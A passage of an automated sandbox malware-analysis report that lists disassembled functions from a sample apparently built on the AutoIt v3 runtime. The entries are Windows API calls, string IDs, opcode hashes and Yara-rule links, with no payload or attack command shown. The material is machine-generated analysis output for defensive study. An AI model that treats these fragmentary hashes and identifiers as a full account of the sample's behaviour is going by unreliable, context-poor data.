                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BB511E
                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00BB5133
                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BB5146
                                              • IsWindowVisible.USER32(?), ref: 00BB5166
                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BB5181
                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BB5195
                                              • GetWindowRect.USER32(?,?), ref: 00BB51AD
                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00BB51D3
                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00BB51ED
                                              • CopyRect.USER32(?,?), ref: 00BB5204
                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00BB526F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                              • String ID: ($0$tooltips_class32
                                              • API String ID: 698492251-4156429822
                                              • Opcode ID: 92a551268ed94fcdc95afd6a4f388b4fbe9da0964f2caa0f972cb5ad45f1a27a
                                              • Instruction ID: 66e1e1c9130f573171fea852b381ab492c0c3556d5a2f16665665d6585489899
                                              • Opcode Fuzzy Hash: 92a551268ed94fcdc95afd6a4f388b4fbe9da0964f2caa0f972cb5ad45f1a27a
                                              • Instruction Fuzzy Hash: CAB18D71614740AFD714DF64C884BAABBE4FF88310F008A5DF5999B291DBB1EC05CB92
                                              Function 00B9498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B9499C
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B949C2
                                              • _wcscpy.LIBCMT ref: 00B949F0
                                              • _wcscmp.LIBCMT ref: 00B949FB
                                              • _wcscat.LIBCMT ref: 00B94A11
                                              • _wcsstr.LIBCMT ref: 00B94A1C
                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B94A38
                                              • _wcscat.LIBCMT ref: 00B94A81
                                              • _wcscat.LIBCMT ref: 00B94A88
                                              • _wcsncpy.LIBCMT ref: 00B94AB3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                              • API String ID: 699586101-1459072770
                                              • Opcode ID: e3d7731e7b2a52c75ba22c74bc6f035fef8810a455d168a7221ed5d4cf353776
                                              • Instruction ID: e1addf74b2e2aa40beaea3733bbf0f6c1aab2633264583dc94be1ef3ab5ec479
                                              • Opcode Fuzzy Hash: e3d7731e7b2a52c75ba22c74bc6f035fef8810a455d168a7221ed5d4cf353776
                                              • Instruction Fuzzy Hash: 2F41F572A00304BBDB15B7649C43FBF7BECDF45761F0004E9FE04A6192EB349A0696A5
                                              Function 00B32BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B32C8C
                                              • GetSystemMetrics.USER32(00000007), ref: 00B32C94
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B32CBF
                                              • GetSystemMetrics.USER32(00000008), ref: 00B32CC7
                                              • GetSystemMetrics.USER32(00000004), ref: 00B32CEC
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B32D09
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B32D19
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B32D4C
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B32D60
                                              • GetClientRect.USER32(00000000,000000FF), ref: 00B32D7E
                                              • GetStockObject.GDI32(00000011), ref: 00B32D9A
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B32DA5
                                                • Part of subcall function 00B32714: GetCursorPos.USER32(?), ref: 00B32727
                                                • Part of subcall function 00B32714: ScreenToClient.USER32(00BF77B0,?), ref: 00B32744
                                                • Part of subcall function 00B32714: GetAsyncKeyState.USER32(00000001), ref: 00B32769
                                                • Part of subcall function 00B32714: GetAsyncKeyState.USER32(00000002), ref: 00B32777
                                              • SetTimer.USER32(00000000,00000000,00000028,00B313C7), ref: 00B32DCC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: AutoIt v3 GUI
                                              • API String ID: 1458621304-248962490
                                              • Opcode ID: 6787a6b98485ac3e40a263ada3b74736fc2bc191e6eb89e18c18a233a5b6b2af
                                              • Instruction ID: 150c8c30be1b309ec3888facdeaaa86554c6a374ee80170f201e006c99256520
                                              • Opcode Fuzzy Hash: 6787a6b98485ac3e40a263ada3b74736fc2bc191e6eb89e18c18a233a5b6b2af
                                              • Instruction Fuzzy Hash: 97B13C7165020AEFDB14EFA8DC99BBD7BF4FB08310F2041A9FA55A7290DB74A850CB54
                                              Function 00B50429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              • GetForegroundWindow.USER32(00BC0980,?,?,?,?,?), ref: 00B504E3
                                              • IsWindow.USER32(?), ref: 00B866BB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Foreground_memmove
                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                              • API String ID: 3828923867-1919597938
                                              • Opcode ID: 93b36b1e5342dfb869a24bfc338d901863c9451c1cb9b23dcfde3492d12cf048
                                              • Instruction ID: 95b292e7155edb5b77b4f0da6d2b5a41b6865d38295f4afc535d83d55d2ead84
                                              • Opcode Fuzzy Hash: 93b36b1e5342dfb869a24bfc338d901863c9451c1cb9b23dcfde3492d12cf048
                                              • Instruction Fuzzy Hash: BDD19030504242DBCB04FF24C581AAABBF5FF54344F104AE9F855976B2DB30EA99CB92
                                              Function 00BB441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00BB44AC
                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BB456C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                              • API String ID: 3974292440-719923060
                                              • Opcode ID: 05ac15d9fb4ffa1467913bea4b6517be2369ed3e0849d359a0bc9c231bb961b8
                                              • Instruction ID: 4bf8ce452a4c53a66be5532bff732f8cbabe3a0890e5bce9d96696b0df009d90
                                              • Opcode Fuzzy Hash: 05ac15d9fb4ffa1467913bea4b6517be2369ed3e0849d359a0bc9c231bb961b8
                                              • Instruction Fuzzy Hash: 84A13D302146419BCB14EF24C991ABAB7E5FF95314F2049E8B8A69B3E2DF70ED05CB51
                                              Function 00BA56C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00BA56E1
                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00BA56EC
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BA56F7
                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00BA5702
                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00BA570D
                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00BA5718
                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00BA5723
                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00BA572E
                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00BA5739
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00BA5744
                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00BA574F
                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00BA575A
                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00BA5765
                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00BA5770
                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00BA577B
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00BA5786
                                              • GetCursorInfo.USER32(?), ref: 00BA5796
                                              • GetLastError.KERNEL32(00000001,00000000), ref: 00BA57C1
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Cursor$Load$ErrorInfoLast
                                              • String ID:
                                              • API String ID: 3215588206-0
                                              • Opcode ID: f38d87e93c15662cd3373c030c52b644b90b8c213b0678d5e3b5f8764591b35e
                                              • Instruction ID: 4b6e77f87c4bcfd19e90d651c78dbccf84a1720f780b5e0b5728d8e4add0d50b
                                              • Opcode Fuzzy Hash: f38d87e93c15662cd3373c030c52b644b90b8c213b0678d5e3b5f8764591b35e
                                              • Instruction Fuzzy Hash: 97415870D08319AADB109FB68C49D6FFEF8EF55B10B10456FE509E7290DA786901CE51
                                              Function 00B8B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00B8B17B
                                              • __swprintf.LIBCMT ref: 00B8B21C
                                              • _wcscmp.LIBCMT ref: 00B8B22F
                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B8B284
                                              • _wcscmp.LIBCMT ref: 00B8B2C0
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00B8B2F7
                                              • GetDlgCtrlID.USER32(?), ref: 00B8B349
                                              • GetWindowRect.USER32(?,?), ref: 00B8B37F
                                              • GetParent.USER32(?), ref: 00B8B39D
                                              • ScreenToClient.USER32(00000000), ref: 00B8B3A4
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00B8B41E
                                              • _wcscmp.LIBCMT ref: 00B8B432
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00B8B458
                                              • _wcscmp.LIBCMT ref: 00B8B46C
                                                • Part of subcall function 00B5385C: _iswctype.LIBCMT ref: 00B53864
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                              • String ID: %s%u
                                              • API String ID: 3744389584-679674701
                                              • Opcode ID: 45803fa8c93fe8701e00e3083435a652aa1a196d804f034a1dc941a33d5c5bb9
                                              • Instruction ID: 72c5661ff9e3e19692a242a6815065975af2a346275aeaf4cc9101a3e5ff9792
                                              • Opcode Fuzzy Hash: 45803fa8c93fe8701e00e3083435a652aa1a196d804f034a1dc941a33d5c5bb9
                                              • Instruction Fuzzy Hash: 7CA1D171204206EFDB14EF74C885FAAB7E8FF48354F048669F999D22A1DB30E955CB90
                                              Function 00B8BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 00B8BAB1
                                              • _wcscmp.LIBCMT ref: 00B8BAC2
                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 00B8BAEA
                                              • CharUpperBuffW.USER32(?,00000000), ref: 00B8BB07
                                              • _wcscmp.LIBCMT ref: 00B8BB25
                                              • _wcsstr.LIBCMT ref: 00B8BB36
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00B8BB6E
                                              • _wcscmp.LIBCMT ref: 00B8BB7E
                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 00B8BBA5
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00B8BBEE
                                              • _wcscmp.LIBCMT ref: 00B8BBFE
                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 00B8BC26
                                              • GetWindowRect.USER32(00000004,?), ref: 00B8BC8F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                              • String ID: @$ThumbnailClass
                                              • API String ID: 1788623398-1539354611
                                              • Opcode ID: 52798c533abf78a93894e9ad087f0a44b4c5e8073b7f6af23c85143539a9be0b
                                              • Instruction ID: 2458d59dff77a883fe42b1ea58914f820c184e95f3562c5fc1cd5332e58afb0b
                                              • Opcode Fuzzy Hash: 52798c533abf78a93894e9ad087f0a44b4c5e8073b7f6af23c85143539a9be0b
                                              • Instruction Fuzzy Hash: E98191710043059BDB14EF24C885FAA7BE8FF48754F1485EAFD899A0A6DB30DE49CB61
                                              Function 00B8B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                              • API String ID: 1038674560-1810252412
                                              • Opcode ID: 0c7fe752a5d2a940a2a28ebf452286a22ddf5040090cf34a90ddaa5b06c144fc
                                              • Instruction ID: d934ececcefc7af7fe91e425203eb5091e3a789c6438039d35a89599646785d9
                                              • Opcode Fuzzy Hash: 0c7fe752a5d2a940a2a28ebf452286a22ddf5040090cf34a90ddaa5b06c144fc
                                              • Instruction Fuzzy Hash: 9231CD70A40245AACB14FBA5CD93EAD77F8AF20790F2005E5F941B10F2EF666F48D652
                                              Function 00B8CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadIconW.USER32(00000063), ref: 00B8CBAA
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B8CBBC
                                              • SetWindowTextW.USER32(?,?), ref: 00B8CBD3
                                              • GetDlgItem.USER32(?,000003EA), ref: 00B8CBE8
                                              • SetWindowTextW.USER32(00000000,?), ref: 00B8CBEE
                                              • GetDlgItem.USER32(?,000003E9), ref: 00B8CBFE
                                              • SetWindowTextW.USER32(00000000,?), ref: 00B8CC04
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B8CC25
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B8CC3F
                                              • GetWindowRect.USER32(?,?), ref: 00B8CC48
                                              • SetWindowTextW.USER32(?,?), ref: 00B8CCB3
                                              • GetDesktopWindow.USER32 ref: 00B8CCB9
                                              • GetWindowRect.USER32(00000000), ref: 00B8CCC0
                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00B8CD0C
                                              • GetClientRect.USER32(?,?), ref: 00B8CD19
                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00B8CD3E
                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B8CD69
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                              • String ID:
                                              • API String ID: 3869813825-0
                                              • Opcode ID: 14980f0ac3fb466544869b82f73ddc8869652c1628242f8cfd5dd4e06c917469
                                              • Instruction ID: 257f1bc346331546da88aba676e730dfd621b1311d2b76812d19b8daa6bd48a7
                                              • Opcode Fuzzy Hash: 14980f0ac3fb466544869b82f73ddc8869652c1628242f8cfd5dd4e06c917469
                                              • Instruction Fuzzy Hash: 34514D70900709EFDB20AFA8CE85F6EBBF5FB08705F000569E556A35A0CB74A954CF50
                                              Function 00BBA7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BBA87E
                                              • DestroyWindow.USER32(00000000,?), ref: 00BBA8F8
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BBA972
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BBA994
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BBA9A7
                                              • DestroyWindow.USER32(00000000), ref: 00BBA9C9
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B30000,00000000), ref: 00BBAA00
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BBAA19
                                              • GetDesktopWindow.USER32 ref: 00BBAA32
                                              • GetWindowRect.USER32(00000000), ref: 00BBAA39
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BBAA51
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BBAA69
                                                • Part of subcall function 00B329AB: GetWindowLongW.USER32(?,000000EB), ref: 00B329BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                              • String ID: 0$tooltips_class32
                                              • API String ID: 1297703922-3619404913
                                              • Opcode ID: 6471ccfa2e2e103c83560d18964561d645241e3e822edda8acae09fa363743d0
                                              • Instruction ID: 99a79eb3c8bd841d747c2bedafa81777f54137cb2a0ed975b4a47dc87461f2d6
                                              • Opcode Fuzzy Hash: 6471ccfa2e2e103c83560d18964561d645241e3e822edda8acae09fa363743d0
                                              • Instruction Fuzzy Hash: FD717871554204AFD721DF28CC49FBB7BE5EB88304F04069DF986972A1DBB0A906DB62
                                              Function 00BBCCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • DragQueryPoint.SHELL32(?,?), ref: 00BBCCCF
                                                • Part of subcall function 00BBB1A9: ClientToScreen.USER32(?,?), ref: 00BBB1D2
                                                • Part of subcall function 00BBB1A9: GetWindowRect.USER32(?,?), ref: 00BBB248
                                                • Part of subcall function 00BBB1A9: PtInRect.USER32(?,?,00BBC6BC), ref: 00BBB258
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00BBCD38
                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BBCD43
                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BBCD66
                                              • _wcscat.LIBCMT ref: 00BBCD96
                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BBCDAD
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00BBCDC6
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00BBCDDD
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00BBCDFF
                                              • DragFinish.SHELL32(?), ref: 00BBCE06
                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00BBCEF9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                              • API String ID: 169749273-3440237614
                                              • Opcode ID: ae80a46039a07f1d3925878f570baceb965fc57b862e987dc4f63e2a20cb6702
                                              • Instruction ID: 6847470460ef760ef836f9fef6d246e5c1569d522bea34f3b7a3d2739b1da49a
                                              • Opcode Fuzzy Hash: ae80a46039a07f1d3925878f570baceb965fc57b862e987dc4f63e2a20cb6702
